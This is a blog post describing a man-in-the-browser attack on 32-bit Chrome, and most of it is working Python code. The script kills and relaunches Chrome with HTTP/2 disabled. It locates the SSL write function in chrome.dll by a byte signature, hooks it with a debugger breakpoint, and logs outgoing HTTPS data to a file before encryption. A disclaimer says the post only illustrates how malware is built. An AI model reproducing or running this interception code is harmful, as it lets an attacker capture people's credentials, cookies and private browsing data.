Blog


Man in the browser on Chrome

Another weekend, another Mitb article!
This time We will talk about Chrome 32bit (one of the latest version).

Before proceed...
The only purpose of this article is to illustrate how bad guys develop their malicious software.
I don't take any responsibility about illegal actions carried out by readers.
Curiosity is how software works, not how to damage others!

After some googling I was able to identify chrome.dll as holder of SSL3 methods; in particular of ssl3_write_app method.
It has been helpful the following code (in order to find the pid of process where chrome.dll is loaded):

from winappdbg import *

System.request_debug_privileges()
debug = Debug()
                
if __name__ == "__main__":
    system = System()
    tup = ()
    requests = []
    for p in system:
        found = False
        if "chrome.exe" in str(p.get_filename()):
            process = Process(p.get_pid())
            
            bits = process.get_bits()
            for mod in process.iter_modules():    
                if "chrome.dll" in mod.get_filename().lower():
                    found = True
                    chrome_dll = mod
                    mod_addr = chrome_dll.get_base()
                    mod_size = chrome_dll.get_size()
                    print p.get_pid()
I was able to identify the SSL3 structure signature which starts with "0000000304030000".
We could easily place a breakpoint on each address in order to find ssl3_write_app.
Furthermore, like on Firefox, We need to disable http2 with command line flag --disable-http2.

So follows the final Python script:
from winappdbg import *

System.request_debug_privileges()
debug = Debug()

def reverseList(aList):
    rev = aList[::-1]
    outString = ""
    for el in rev:
        outString += el + ""
    return outString

def toHex(s):
    lst = []
    for ch in s:
        hv = hex(ord(ch)).replace('0x', '')
        if len(hv) == 1:
            hv = '0'+hv
        lst.append(hv)
    
    return reduce(lambda x,y:x+y, lst)

    
def steal_ssl(event):
    f = open("log_chrome.bin","a")
    process = event.get_process()
    thread = event.get_thread()
    stack = thread.get_sp()
    subsystem = process.read_pointer(stack+0x4)
    value_p = process.read_pointer(stack+0x8)
    
    value = process.read(value_p, 1)
    while value[-1:] != 'x00':
        value += process.read(value_p+len(value),1)
    
    f.write(value)
    print "Data: %d, %s"%(subsystem,value)
    f.close()
    debug.cont(event)


    
def scan(c_kill):        
    system = System()
    tup = ()
    requests = []
    for p in system:
        found = False
        if "chrome.exe" in str(p.get_filename()):
            process = Process(p.get_pid())
            if c_kill == 0:
                for pp in system:
                     if "chrome.exe" in str(pp.get_filename()):
                         pp.kill()
                system.start_process(str(p.get_filename()) + " --disable-http2")
                return -1
            bits = process.get_bits()
            for mod in process.iter_modules():    
                if "chrome.dll" in mod.get_filename().lower():
                    found = True
                    chrome_dll = mod
                    mod_addr = chrome_dll.get_base()
                    mod_size = chrome_dll.get_size()
                    print p.get_pid()
                    # Print Pre-Encrypted Request
                    hook_ssl = []
                    addresses = process.search_bytes("\x00\x00\x00\x03\x04\x03\x00\x00", minAddr=int(mod_addr+1), maxAddr=int(mod_addr+mod_size))
                    for a in addresses:
                        a = a + 48
                        
                    ssl_write = process.read(a, 4)                    
                    tmp = toHex(reverseList(ssl_write))
                    
                    debug.attach(p.get_pid())
                    debug.break_at(p.get_pid(), int(tmp, 16),steal_ssl)
                    c = 0
                    
                    try:
                        debug.loop()
                    finally:
                        debug.detach(p.get_pid())

if __name__ == "__main__":
    c_kill = 0
    scan(c_kill)
    c_kill += 1
    scan(c_kill)
Good Saturday night :)